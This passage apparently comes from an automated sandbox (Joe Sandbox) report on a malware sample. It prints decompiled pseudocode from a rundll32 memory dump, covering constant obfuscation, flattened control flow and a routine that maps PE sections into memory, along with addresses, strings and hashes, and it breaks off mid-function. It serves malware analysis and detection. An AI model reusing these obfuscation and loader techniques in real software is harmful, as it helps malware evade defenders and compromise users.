				 *(_t380 + 0x48) =  *(_t380 + 0x48) ^ 0x892fdeff;
				 *(_t380 + 4) = 0x4aa3;
				 *(_t380 + 4) =  *(_t380 + 4) >> 0xc;
				 *(_t380 + 4) =  *(_t380 + 4) | 0x950899f8;
				 *(_t380 + 4) =  *(_t380 + 4) << 4;
				 *(_t380 + 4) =  *(_t380 + 4) ^ 0x50899fc1;
				 *(_t380 + 0x34) = 0x5ec9;
				 *(_t380 + 0x8c) = 0;
				 *(_t380 + 0x44) =  *(_t380 + 0x34) * 0x1a;
				_t371 = 0x70;
				 *(_t380 + 0x48) =  *(_t380 + 0x44) * 0x3f;
				 *(_t380 + 0x48) =  *(_t380 + 0x48) ^ 0x025e429c;
				 *(_t380 + 0x60) = 0xe88e;
				 *(_t380 + 0x60) =  *(_t380 + 0x60) >> 5;
				 *(_t380 + 0x60) =  *(_t380 + 0x60) + 0xffff58a0;
				 *(_t380 + 0x60) =  *(_t380 + 0x60) ^ 0xffff02fa;
				 *(_t380 + 0x58) = 0xbd5e;
				 *(_t380 + 0x58) =  *(_t380 + 0x58) ^ 0xb084e46b;
				 *(_t380 + 0x58) =  *(_t380 + 0x58) >> 0xe;
				 *(_t380 + 0x58) =  *(_t380 + 0x58) ^ 0x0002e87c;
				 *(_t380 + 0x2c) = 0x606e;
				 *(_t380 + 0x2c) =  *(_t380 + 0x2c) + 0xffff1c2d;
				 *(_t380 + 0x2c) =  *(_t380 + 0x2c) + 0x108d;
				 *(_t380 + 0x2c) =  *(_t380 + 0x2c) * 0x15;
				 *(_t380 + 0x2c) =  *(_t380 + 0x2c) ^ 0xfff6a15c;
				 *(_t380 + 0x4c) = 0xb86a;
				 *(_t380 + 0x4c) =  *(_t380 + 0x4c) + 0xd5ca;
				 *(_t380 + 0x4c) =  *(_t380 + 0x4c) | 0x7ce26820;
				 *(_t380 + 0x4c) =  *(_t380 + 0x4c) ^ 0x7ce3b1fe;
				 *(_t380 + 0x44) = 0x5cf7;
				 *(_t380 + 0x44) =  *(_t380 + 0x44) | 0x38977032;
				 *(_t380 + 0x44) =  *(_t380 + 0x44) * 0x30;
				 *(_t380 + 0x44) =  *(_t380 + 0x44) ^ 0x9c67384b;
				 *(_t380 + 0x74) = 0xd45b;
				 *(_t380 + 0x74) =  *(_t380 + 0x74) / _t371;
				 *(_t380 + 0x74) =  *(_t380 + 0x74) ^ 0x00004dc6;
				 *(_t380 + 0x14) = 0x87c2;
				 *(_t380 + 0x14) =  *(_t380 + 0x14) + 0xc44a;
				 *(_t380 + 0x14) =  *(_t380 + 0x14) ^ 0x3473056e;
				 *(_t380 + 0x14) =  *(_t380 + 0x14) ^ 0x529657aa;
				 *(_t380 + 0x14) =  *(_t380 + 0x14) ^ 0x66e43592;
				 *(_t380 + 0x6c) = 0x3ddc;
				 *(_t380 + 0x6c) =  *(_t380 + 0x6c) >> 6;
				 *(_t380 + 0x6c) =  *(_t380 + 0x6c) ^ 0x00003a4d;
				 *(_t380 + 0x3c) = 0xc186;
				 *(_t380 + 0x3c) =  *(_t380 + 0x3c) + 0xffff2874;
				_t372 = 0x60;
				 *(_t380 + 0x38) =  *(_t380 + 0x3c) / _t372;
				 *(_t380 + 0x38) =  *(_t380 + 0x38) ^ 0x02aacd93;
				 *(_t380 + 0x94) = 0x420b;
				 *(_t380 + 0x94) =  *(_t380 + 0x94) + 0xffff81cc;
				 *(_t380 + 0x94) =  *(_t380 + 0x94) ^ 0xffffbf2e;
				 *(_t380 + 0x24) = 0x5d05;
				 *(_t380 + 0x24) =  *(_t380 + 0x24) << 7;
				 *(_t380 + 0x24) =  *(_t380 + 0x24) >> 0xf;
				 *(_t380 + 0x24) =  *(_t380 + 0x24) ^ 0x53344f8a;
				 *(_t380 + 0x24) =  *(_t380 + 0x24) ^ 0x53345d77;
				 *(_t380 + 0x78) = 0xceba;
				 *(_t380 + 0x78) =  *(_t380 + 0x78) >> 0x10;
				 *(_t380 + 0x78) =  *(_t380 + 0x78) ^ 0x00002af4;
				 *(_t380 + 0x1c) = 0x6278;
				 *(_t380 + 0x1c) =  *(_t380 + 0x1c) << 0xa;
				 *(_t380 + 0x1c) =  *(_t380 + 0x1c) ^ 0x09bc8c53;
				 *(_t380 + 0x1c) =  *(_t380 + 0x1c) + 0xd5e;
				 *(_t380 + 0x1c) =  *(_t380 + 0x1c) ^ 0x08353d86;
				 *(_t380 + 0x18) = 0x457c;
				 *(_t380 + 0x18) =  *(_t380 + 0x18) ^ 0x1123efff;
				 *(_t380 + 0x18) =  *(_t380 + 0x18) + 0x9050;
				 *(_t380 + 0x18) =  *(_t380 + 0x18) ^ 0x715c45c2;
				 *(_t380 + 0x18) =  *(_t380 + 0x18) ^ 0x607832f2;
				 *(_t380 + 0x4c) = 0x48c4;
				 *(_t380 + 0x4c) =  *(_t380 + 0x4c) + 0x892d;
				 *(_t380 + 0x4c) =  *(_t380 + 0x4c) ^ 0x18e86949;
				 *(_t380 + 0x4c) =  *(_t380 + 0x4c) ^ 0x18e8d95b;
				 *(_t380 + 0x64) = 0xb936;
				 *(_t380 + 0x64) =  *(_t380 + 0x64) + 0xd883;
				 *(_t380 + 0x64) =  *(_t380 + 0x64) ^ 0x0001ac1b;
				 *(_t380 + 0x20) = 0xcbd2;
				_t373 = 0x7c;
				 *(_t380 + 0x20) =  *(_t380 + 0x20) * 0x1d;
				 *(_t380 + 0x20) =  *(_t380 + 0x20) / _t373;
				 *(_t380 + 0x20) =  *(_t380 + 0x20) | 0xfc977955;
				 *(_t380 + 0x20) =  *(_t380 + 0x20) ^ 0xfc977dd0;
				 *(_t380 + 0x6c) = 0x94d3;
				 *(_t380 + 0x6c) =  *(_t380 + 0x6c) | 0xdadf67d0;
				 *(_t380 + 0x6c) =  *(_t380 + 0x6c) ^ 0xdadfc8fb;
				 *(_t380 + 0x90) = 0xca42;
				 *(_t380 + 0x90) =  *(_t380 + 0x90) * 0x44;
				 *(_t380 + 0x90) =  *(_t380 + 0x90) ^ 0x0035a538;
				 *(_t380 + 0x3c) = 0x3a85;
				 *(_t380 + 0x3c) =  *(_t380 + 0x3c) | 0x6827828e;
				 *(_t380 + 0x3c) =  *(_t380 + 0x3c) >> 5;
				 *(_t380 + 0x3c) =  *(_t380 + 0x3c) ^ 0x0341637e;
				 *(_t380 + 0x74) = 0xaf39;
				 *(_t380 + 0x74) =  *(_t380 + 0x74) << 0xb;
				 *(_t380 + 0x74) =  *(_t380 + 0x74) ^ 0x0579f034;
				 *(_t380 + 0x84) = 0x7bfe;
				 *(_t380 + 0x84) =  *(_t380 + 0x84) * 0x70;
				 *(_t380 + 0x84) =  *(_t380 + 0x84) ^ 0x0036086b;
				 *(_t380 + 0x88) = 0xbca6;
				 *(_t380 + 0x88) =  *(_t380 + 0x88) + 0xffffd080;
				 *(_t380 + 0x88) =  *(_t380 + 0x88) ^ 0x0000ec3f;
				 *(_t380 + 0x7c) = 0x7bcd;
				 *(_t380 + 0x7c) =  *(_t380 + 0x7c) >> 0xf;
				 *(_t380 + 0x7c) =  *(_t380 + 0x7c) ^ 0x00003bde;
				 *(_t380 + 0x8c) = 0x5f89;
				 *(_t380 + 0x8c) =  *(_t380 + 0x8c) + 0x6fee;
				 *(_t380 + 0x8c) =  *(_t380 + 0x8c) ^ 0x0000a333;
				 *(_t380 + 0x2c) = 0x86b9;
				 *(_t380 + 0x2c) =  *(_t380 + 0x2c) + 0xffffbf3c;
				 *(_t380 + 0x2c) =  *(_t380 + 0x2c) >> 5;
				 *(_t380 + 0x2c) =  *(_t380 + 0x2c) >> 4;
				 *(_t380 + 0x2c) =  *(_t380 + 0x2c) ^ 0x000073b3;
				 *(_t380 + 0x50) = 0x2126;
				 *(_t380 + 0x50) =  *(_t380 + 0x50) ^ 0x2e94f228;
				 *(_t380 + 0x50) =  *(_t380 + 0x50) >> 0xe;
				 *(_t380 + 0x50) =  *(_t380 + 0x50) ^ 0x00008d73;
				 *(_t380 + 0x80) = 0xf6ec;
				 *(_t380 + 0x80) =  *(_t380 + 0x80) * 0x34;
				 *(_t380 + 0x80) =  *(_t380 + 0x80) ^ 0x003277fb;
				 *(_t380 + 0x60) = 0x3ac6;
				 *(_t380 + 0x60) =  *(_t380 + 0x60) * 0x28;
				 *(_t380 + 0x60) =  *(_t380 + 0x60) | 0xd79c8d1c;
				 *(_t380 + 0x60) =  *(_t380 + 0x60) ^ 0xd79df08f;
				 *(_t380 + 0x30) = 0x4848;
				 *(_t380 + 0x30) =  *(_t380 + 0x30) ^ 0x9b476349;
				 *(_t380 + 0x30) =  *(_t380 + 0x30) ^ 0x919ac53c;
				 *(_t380 + 0x30) =  *(_t380 + 0x30) ^ 0x0adda027;
				 *(_t380 + 0x34) = 0xf09c;
				 *(_t380 + 0x34) =  *(_t380 + 0x34) << 0xc;
				_t374 = 0x28650a76;
				_t368 =  *((intOrPtr*)(_t380 + 0x98));
				_t334 =  *((intOrPtr*)(_t380 + 0x98));
				_t378 =  *((intOrPtr*)(_t380 + 0x98));
				 *(_t380 + 0x34) =  *(_t380 + 0x34) * 0x3e;
				 *(_t380 + 0x34) =  *(_t380 + 0x34) ^ 0xa45c8003;
				while(_t336 != 0xd3df7e1) {
					if(_t336 == 0x132cc48f) {
						E00B2F536( *(_t380 + 0x34),  *(_t380 + 0x58),  *(_t380 + 0x84), _t368);
						_t336 = 0xd3df7e1;
						continue;
					}
					if(_t336 == 0x159b7bb7) {
						_push(_t336);
						_push(_t336);
						 *((intOrPtr*)(_t380 + 0xa0)) = 0x1000;
						_t368 = E00B28736(0x1000);
						__eflags = _t368;
						_t336 =  !=  ? _t374 : 0xd3df7e1;
						continue;
					}
					if(_t336 == 0x18c2a499) {
						_t319 = E00B2B566(_t336,  *(_t380 + 0x44) | 0x00000006,  *(_t380 + 0x74),  *((intOrPtr*)(_t380 + 0x68)), 1,  *(_t380 + 0x90), _t336,  *((intOrPtr*)(_t380 + 0x28)),  *(_t380 + 0x7c), 0x2000000,  *(_t380 + 0x44),  *((intOrPtr*)(_t380 + 0x9c)),  *(_t380 + 0x38), _t380 + 0xb0);
						_t334 = _t319;
						_t380 = _t380 + 0x30;
						__eflags = _t319 - 0xffffffff;
						if(__eflags == 0) {
							L29:
							__eflags = 0;
							return 0;
						}
						_t336 = 0x159b7bb7;
						continue;
					}
					if(_t336 == 0x1a0fbde3) {
						E00B33E3F(_t336, _t380 + 0xb4, __eflags,  *(_t380 + 0x48),  *((intOrPtr*)(_t380 + 0x5c)));
						_t322 = E00B228CE(_t380 + 0xbc,  *(_t380 + 0x60),  *(_t380 + 0x30));
						_t378 = _t322;
						_t380 = _t380 + 0xc;
						_t336 = 0x18c2a499;
						 *((short*)(_t322 - 2)) = 0;
						continue;
					}
					if(_t336 == 0x262df760) {
						_t336 = 0x1a0fbde3;
						continue;
					}
					if(_t336 != _t374) {
						L28:
						__eflags = _t336 - 0x1c26cb40;
						if(__eflags != 0) {
							continue;
						}
						goto L29;
					}
					_t325 = E00B36319( *(_t380 + 0x44), _t334,  *((intOrPtr*)(_t380 + 0xc4)),  *(_t380 + 0x74),  *(_t380 + 0x7c),  *(_t380 + 0x84), _t368,  *(_t380 + 0x38), _t336,  *(_t380 + 0x7c), _t336, _t336,  *(_t380 + 0x94), _t380 + 0xac);
					_t380 = _t380 + 0x30;
					if(_t325 == 0) {
						_t326 =  *((intOrPtr*)(_t380 + 0x9c));
						L18:
						__eflags = _t326;
						if(__eflags == 0) {
							_t336 = _t374;
						} else {
							_t327 =  *0xb3ca30; // 0x0
							E00B38A4B( *(_t380 + 0x90),  *(_t380 + 0x94),  *(_t380 + 0x84),  *((intOrPtr*)(_t327 + 8)),  *(_t380 + 0x8c));
							_t380 = _t380 + 0xc;
							_t336 = 0x132cc48f;
						}
						continue;
					}
					_t376 = _t368;
					while( *((intOrPtr*)(_t376 + 4)) != 4 || E00B28624( *(_t380 + 0x44), _t378,  *(_t380 + 0x78), _t376 + 0xc) != 0) {
						_t329 =  *_t376;
						if(_t329 == 0) {
							_t326 =  *((intOrPtr*)(_t380 + 0x9c));
							L17:
							_t374 = 0x28650a76;
							goto L18;
						}
						_t376 = _t376 + _t329;
					}
					_t326 = 1;
					 *((intOrPtr*)(_t380 + 0x9c)) = 1;
					goto L17;
				}
				E00B34F7D( *(_t380 + 0x60),  *(_t380 + 0x30), _t334);
				_t336 = 0x1c26cb40;
				goto L28;
			}

0x00b2e37d
0x00b2e38a
0x00b2e393
0x00b2e39a
0x00b2e39f
0x00b2e3a7
0x00b2e3ac
0x00b2e3b4
0x00b2e3bc
0x00b2e3c4
0x00b2e3c9
0x00b2e3d1
0x00b2e3d6
0x00b2e3de
0x00b2e3e6
0x00b2e3f6
0x00b2e401
0x00b2e404
0x00b2e408
0x00b2e410
0x00b2e418
0x00b2e41d
0x00b2e425
0x00b2e42d
0x00b2e435
0x00b2e43d
0x00b2e442
0x00b2e44a
0x00b2e452
0x00b2e45a
0x00b2e467
0x00b2e46b
0x00b2e473
0x00b2e47b
0x00b2e483
0x00b2e48b
0x00b2e493
0x00b2e49b
0x00b2e4a8
0x00b2e4ac
0x00b2e4b4
0x00b2e4c4
0x00b2e4c8
0x00b2e4d0
0x00b2e4d8
0x00b2e4e0
0x00b2e4e8
0x00b2e4f0
0x00b2e4f8
0x00b2e500
0x00b2e505
0x00b2e50d
0x00b2e515
0x00b2e521
0x00b2e524
0x00b2e528
0x00b2e530
0x00b2e53b
0x00b2e546
0x00b2e551
0x00b2e559
0x00b2e55e
0x00b2e563
0x00b2e56b
0x00b2e573
0x00b2e57d
0x00b2e582
0x00b2e58a
0x00b2e592
0x00b2e597
0x00b2e59f
0x00b2e5a7
0x00b2e5af
0x00b2e5b7
0x00b2e5bf
0x00b2e5c7
0x00b2e5cf
0x00b2e5d7
0x00b2e5df
0x00b2e5e7
0x00b2e5ef
0x00b2e5f7
0x00b2e5ff
0x00b2e607
0x00b2e60f
0x00b2e61e
0x00b2e61f
0x00b2e629
0x00b2e62d
0x00b2e635
0x00b2e63d
0x00b2e645
0x00b2e64d
0x00b2e655
0x00b2e668
0x00b2e66f
0x00b2e67a
0x00b2e682
0x00b2e68a
0x00b2e68f
0x00b2e697
0x00b2e69f
0x00b2e6a4
0x00b2e6ac
0x00b2e6bf
0x00b2e6c6
0x00b2e6d1
0x00b2e6dc
0x00b2e6e7
0x00b2e6f2
0x00b2e6fa
0x00b2e6ff
0x00b2e707
0x00b2e712
0x00b2e71d
0x00b2e728
0x00b2e730
0x00b2e738
0x00b2e73d
0x00b2e742
0x00b2e74a
0x00b2e752
0x00b2e75a
0x00b2e75f
0x00b2e767
0x00b2e77a
0x00b2e781
0x00b2e78c
0x00b2e799
0x00b2e79d
0x00b2e7a5
0x00b2e7ad
0x00b2e7b5
0x00b2e7bd
0x00b2e7c5
0x00b2e7cd
0x00b2e7d5
0x00b2e7da
0x00b2e7e4
0x00b2e7eb
0x00b2e7f2
0x00b2e7f9
0x00b2e7fd
0x00b2e805
0x00b2e817
0x00b2ea0c
0x00b2ea13
0x00000000
0x00b2ea13
0x00b2e823
0x00b2e9d2
0x00b2e9d3
0x00b2e9d9
0x00b2e9ea
0x00b2e9ed
0x00b2e9f4
0x00000000
0x00b2e9f4
0x00b2e82f
0x00b2e9a9
0x00b2e9ae
0x00b2e9b0
0x00b2e9b3
0x00b2e9b6
0x00b2ea3d
0x00b2ea40
0x00b2ea49
0x00b2ea49
0x00b2e9bc
0x00000000
0x00b2e9bc
0x00b2e83b
0x00b2e93e
0x00b2e952
0x00b2e957
0x00b2e959
0x00b2e95e
0x00b2e963
0x00000000
0x00b2e963
0x00b2e847
0x00b2e925
0x00000000
0x00b2e925
0x00b2e84f
0x00b2ea31
0x00b2ea31
0x00b2ea37
0x00000000
0x00000000
0x00000000
0x00b2ea37
0x00b2e88c
0x00b2e891
0x00b2e896
0x00b2e8cf
0x00b2e8e4
0x00b2e8e4
0x00b2e8e6
0x00b2e91e
0x00b2e8e8
0x00b2e8ef
0x00b2e90c
0x00b2e911
0x00b2e914
0x00b2e914
0x00000000
0x00b2e8e6
0x00b2e898
0x00b2e89a
0x00b2e8b9
0x00b2e8bd
0x00b2e8d8
0x00b2e8df
0x00b2e8df
0x00000000
0x00b2e8df
0x00b2e8bf
0x00b2e8bf
0x00b2e8c5
0x00b2e8c6
0x00000000
0x00b2e8c6
0x00b2ea26
0x00b2ea2c
0x00000000

Strings

o, xrefs: 00B2E712
M:, xrefs: 00B2E505
&!, xrefs: 00B2E74A
w]4S, xrefs: 00B2E56B
ve(, xrefs: 00B2E7DA
n`, xrefs: 00B2E44A
|E, xrefs: 00B2E5AF
h|, xrefs: 00B2E483
ve(, xrefs: 00B2E8DF
?, xrefs: 00B2E6E7
^, xrefs: 00B2E59F
HH, xrefs: 00B2E7AD

Memory Dump Source

Source File: 00000007.00000002.2107903712.0000000000B21000.00000020.00000001.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000007.00000002.2107895117.0000000000B20000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2107924836.0000000000B3C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b20000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: h|$&!$?$HH$M:$^$n`$ve($ve($w]4S$|E$o
API String ID: 823142352-1348462970
Opcode ID: 38aa59c7bd53423fd871e17116afef719e7bc49485f9efb2dd448458df4991e3
Instruction ID: 1286f113395d4801e32d01e78fee64d67843f71af97a60388108999dfb59c872
Opcode Fuzzy Hash: 38aa59c7bd53423fd871e17116afef719e7bc49485f9efb2dd448458df4991e3
Instruction Fuzzy Hash: A6F102715083809FE368CF26D54AA5BBBF1FB85708F108A1DE1DA862A0D7B5D909CF17

Uniqueness

Uniqueness Score: -1.00%

Function 00B36DB9, Relevance: 15.2, Strings: 12, Instructions: 224
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E00B36DB9(void* __ecx, void* __edi, void* __ebp, void* __eflags, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v4;
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				void* _t224;
				void* _t243;
				void* _t256;
				void* _t264;
				void* _t288;
				signed int _t290;
				signed int _t291;
				signed int _t292;
				signed int _t293;
				signed int _t294;
				void* _t295;
				void* _t298;
				signed int* _t301;
				signed int* _t302;
				signed int* _t303;

				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(0);
				_push(3);
				_push(__ecx);
				E00B2602B(_t224);
				_v4 = _v4 & 0x00000000;
				_v8 = 0x15bbba;
				_v72 = 0x7e44;
				_t290 = 0x3e;
				_v72 = _v72 * 0x56;
				_v72 = _v72 | 0xe97810d5;
				_v72 = _v72 ^ 0xe97a6add;
				_v56 = 0x50ea;
				_v56 = _v56 >> 9;
				_v56 = _v56 >> 8;
				_v56 = _v56 ^ 0x00008000;
				_v100 = 0x7422;
				_v100 = _v100 + 0xffff8791;
				_v100 = _v100 ^ 0x724a15f0;
				_v100 = _v100 + 0xd05;
				_v100 = _v100 ^ 0x8db5db48;
				_v48 = 0x2edd;
				_v48 = _v48 / _t290;
				_v48 = _v48 ^ 0x00005532;
				_v76 = 0xee3f;
				_v76 = _v76 + 0xffffe6cd;
				_v76 = _v76 + 0xffff5ce1;
				_v76 = _v76 ^ 0x00006965;
				_v104 = 0xa36d;
				_v104 = _v104 << 0xc;
				_v104 = _v104 + 0x5d19;
				_v104 = _v104 >> 1;
				_v104 = _v104 ^ 0x051bebf0;
				_v52 = 0xa852;
				_v52 = _v52 + 0xddb7;
				_v52 = _v52 ^ 0x00019bba;
				_v96 = 0xa4e6;
				_v96 = _v96 | 0xa6d42a45;
				_t291 = 0x2e;
				_v96 = _v96 * 0x22;
				_v96 = _v96 << 1;
				_v96 = _v96 ^ 0x507e3c16;
				_v40 = 0x2ce2;
				_v40 = _v40 + 0xffffe435;
				_v40 = _v40 ^ 0x00002c9b;
				_v64 = 0xad5e;
				_v64 = _v64 * 0xd;
				_v64 = _v64 >> 0xf;
				_v64 = _v64 ^ 0x00006dfc;
				_v68 = 0x15e2;
				_v68 = _v68 << 4;
				_v68 = _v68 + 0x971e;
				_v68 = _v68 ^ 0x0001ffd3;
				_v28 = 0x5912;
				_v28 = _v28 | 0xb77a8e9e;
				_v28 = _v28 ^ 0xb77a927a;
				_v32 = 0xb0a1;
				_v32 = _v32 >> 6;
				_v32 = _v32 ^ 0x000014c1;
				_v36 = 0x1527;
				_v36 = _v36 / _t291;
				_v36 = _v36 ^ 0x000058cb;
				_v92 = 0x32e5;
				_v92 = _v92 * 0x31;
				_v92 = _v92 + 0xffff00ec;
				_v92 = _v92 << 8;
				_v92 = _v92 ^ 0x08be8a0d;
				_v20 = 0xbd6f;
				_v20 = _v20 + 0xab45;
				_v20 = _v20 ^ 0x000148c7;
				_v24 = 0x6d6f;
				_t292 = 0x6d;
				_v24 = _v24 / _t292;
				_v24 = _v24 ^ 0x00002132;
				_v84 = 0xac46;
				_t293 = 0x2f;
				_v84 = _v84 * 0x6c;
				_v84 = _v84 + 0xe89f;
				_v84 = _v84 >> 7;
				_v84 = _v84 ^ 0x0000aacf;
				_v88 = 0x7aeb;
				_v88 = _v88 * 0x1d;
				_v88 = _v88 >> 0xb;
				_t294 = 0x7f;
				_v88 = _v88 / _t293;
				_v88 = _v88 ^ 0x00001cd5;
				_v60 = 0x8b82;
				_v60 = _v60 + 0xffffb5bd;
				_v60 = _v60 * 0x35;
				_v60 = _v60 ^ 0x000df53e;
				_v12 = 0x733f;
				_v12 = _v12 >> 3;
				_v12 = _v12 ^ 0x000065d0;
				_v16 = 0x6f84;
				_v16 = _v16 | 0x29e4272c;
				_v16 = _v16 ^ 0x29e452e1;
				_v80 = 0x4249;
				_v80 = _v80 >> 0xb;
				_v80 = _v80 / _t294;
				_v80 = _v80 >> 3;
				_v80 = _v80 ^ 0x00004a04;
				_v44 = 0x4ba5;
				_v44 = _v44 + 0xffffabaf;
				_v44 = _v44 ^ 0xfffff714;
				_t243 = E00B33811(__ecx, _v48, _a8, _v76, _v104, _v52);
				_t256 = _t243;
				_t301 =  &(( &_v104)[0xb]);
				if(_t256 == 0) {
					return _t243;
				}
				_t295 = E00B27EC5(_v96, _v40,  *((intOrPtr*)(_t256 + 0x50)), _v64, _v68, _v44, __ecx, _v100 | _v72);
				_t302 =  &(_t301[6]);
				if(_t295 == 0) {
					L7:
					return _t295;
				}
				E00B32674(_v28, _v32,  *((intOrPtr*)(_t256 + 0x54)), _t295, _v36, _v92, _a8);
				_t303 =  &(_t302[5]);
				_t288 = ( *(_t256 + 0x14) & 0x0000ffff) + 0x18 + _t256;
				_t298 = ( *(_t256 + 6) & 0x0000ffff) * 0x28 + _t288;
				while(_t288 < _t298) {
					_t261 =  <  ?  *((void*)(_t288 + 8)) :  *((intOrPtr*)(_t288 + 0x10));
					E00B32674(_v20, _v24,  <  ?  *((void*)(_t288 + 8)) :  *((intOrPtr*)(_t288 + 0x10)),  *((intOrPtr*)(_t288 + 0xc)) + _t295, _v84, _v88,  *((intOrPtr*)(_t288 + 0x14)) + _a8);
					_t303 =  &(_t303[5]);
					_t288 = _t288 + 0x28;
				}
				E00B2F7D8(_t295, _t256);
				_t264 = _t295;
				if(E00B2E05A(_t264, _t256) == 0) {
					_push(_t264);
					E00B34FE8(_v56, _t295, _v60, _v12, _v16, _v80);
					_t295 = 0;
				}
				goto L7;
			}

0x00b36dbe
0x00b36dc5
0x00b36dcc
0x00b36dd3
0x00b36dda
0x00b36ddc
0x00b36dde
0x00b36ddf
0x00b36de4
0x00b36dee
0x00b36df9
0x00b36e08
0x00b36e0b
0x00b36e0f
0x00b36e17
0x00b36e1f
0x00b36e27
0x00b36e2c
0x00b36e31
0x00b36e39
0x00b36e41
0x00b36e49
0x00b36e51
0x00b36e59
0x00b36e61
0x00b36e71
0x00b36e75
0x00b36e7d
0x00b36e85
0x00b36e8d
0x00b36e95
0x00b36e9d
0x00b36ea5
0x00b36eaa
0x00b36eb2
0x00b36eb6
0x00b36ebe
0x00b36ec6
0x00b36ece
0x00b36ed6
0x00b36ede
0x00b36eeb
0x00b36eec
0x00b36ef0
0x00b36ef4
0x00b36efc
0x00b36f04
0x00b36f0c
0x00b36f14
0x00b36f21
0x00b36f25
0x00b36f2a
0x00b36f32
0x00b36f3a
0x00b36f3f
0x00b36f47
0x00b36f4f
0x00b36f57
0x00b36f5f
0x00b36f67
0x00b36f6f
0x00b36f74
0x00b36f7c
0x00b36f8a
0x00b36f8e
0x00b36f96
0x00b36fa3
0x00b36fa7
0x00b36fb1
0x00b36fb6
0x00b36fbe
0x00b36fc6
0x00b36fce
0x00b36fd6
0x00b36fe4
0x00b36fe9
0x00b36fef
0x00b36ff7
0x00b37004
0x00b37007
0x00b3700b
0x00b37013
0x00b37018
0x00b37020
0x00b3702d
0x00b37031
0x00b3703c
0x00b3703d
0x00b37043
0x00b3704b
0x00b37053
0x00b37060
0x00b37064
0x00b3706c
0x00b37077
0x00b3707f
0x00b3708a
0x00b37092
0x00b3709a
0x00b370a2
0x00b370aa
0x00b370b5
0x00b370b9
0x00b370be
0x00b370c6
0x00b370ce
0x00b370d6
0x00b370f5
0x00b370fa
0x00b370fc
0x00b37101
0x00b371ee
0x00b371ee
0x00b3712d
0x00b3712f
0x00b37134
0x00b371e7
0x00000000
0x00b371e7
0x00b37157
0x00b37160
0x00b3716d
0x00b3716f
0x00b371aa
0x00b3718d
0x00b3719f
0x00b371a4
0x00b371a7
0x00b371a7
0x00b371b2
0x00b371b9
0x00b371c4
0x00b371c6
0x00b371dd
0x00b371e5
0x00b371e5
0x00000000

Strings

2, xrefs: 00B36F96
z, xrefs: 00B37020
?s, xrefs: 00B3706C
"t, xrefs: 00B36E39
,, xrefs: 00B36EFC
ei, xrefs: 00B36E95
2!, xrefs: 00B36FEF
2U, xrefs: 00B36E75
IB, xrefs: 00B370A2
R), xrefs: 00B3709A
P, xrefs: 00B36E1F
om, xrefs: 00B36FD6

Memory Dump Source

Source File: 00000007.00000002.2107903712.0000000000B21000.00000020.00000001.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000007.00000002.2107895117.0000000000B20000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2107924836.0000000000B3C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b20000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: "t$2!$2U$?s$IB$ei$om$,$2$P$R)$z
API String ID: 0-3377435326
Opcode ID: 3d0207934d40abbc6c7b225edab598dbb3739286f739d077276c6eaf293611b6
Instruction ID: 003f9f6431cf70f19995d96968f93c167d2d9617be0d028b069126ba16e92011
Opcode Fuzzy Hash: 3d0207934d40abbc6c7b225edab598dbb3739286f739d077276c6eaf293611b6
Instruction Fuzzy Hash: 07B122725087809FE364CF25C88A90BFBF1BBC4358F508A1CF695862A0C7B9C549CF42

Uniqueness

Uniqueness Score: -1.00%

Function 00B26D9F, Relevance: 14.1, Strings: 11, Instructions: 340
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E00B26D9F() {
				char _v520;
				char _v1040;
				signed int _v1044;
				intOrPtr _v1048;
				char _v1052;
				signed int _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				signed int _v1148;
				signed int _v1152;
				signed int _v1156;
				signed int _v1160;
				signed int _v1164;
				signed int _v1168;
				signed int _v1172;
				signed int _v1176;
				signed int _v1180;
				signed int _v1184;
				signed int _v1188;
				signed int _v1192;
				signed int _v1196;
				signed int _v1200;
				signed int _v1204;
				signed int _v1208;
				signed int _v1212;
				signed int _v1216;
				void* _t365;
				void* _t366;
				intOrPtr _t368;
				signed int _t376;
				intOrPtr* _t378;
				void* _t379;
				signed int _t384;
				intOrPtr _t385;
				intOrPtr* _t386;
				signed int _t387;
				signed int _t388;
				signed int _t389;
				signed int _t390;
				signed int _t391;
				void* _t392;
				void* _t399;
				void* _t405;
				intOrPtr _t419;
				void* _t427;
				signed int* _t432;

				_t432 =  &_v1216;
				_v1048 = 0x446f36;
				_v1044 = 0;
				_v1168 = 0x4c2;
				_v1168 = _v1168 + 0x4422;
				_v1168 = _v1168 << 0xe;
				_v1168 = _v1168 ^ 0x12390029;
				_v1108 = 0xe6e3;
				_v1108 = _v1108 << 7;
				_v1108 = _v1108 ^ 0x80737181;
				_v1140 = 0x5a14;
				_v1140 = _v1140 + 0xffff6ad9;
				_v1140 = _v1140 + 0x3f04;
				_v1140 = _v1140 ^ 0x000003f3;
				_v1152 = 0xde22;
				_v1056 = 0;
				_t427 = 0x1cf5a099;
				_t387 = 0xc;
				_v1152 = _v1152 / _t387;
				_v1152 = _v1152 + 0x1888;
				_v1152 = _v1152 ^ 0x00005d3c;
				_v1072 = 0x75ae;
				_t388 = 0x55;
				_v1072 = _v1072 * 0x39;
				_v1072 = _v1072 ^ 0x001a1469;
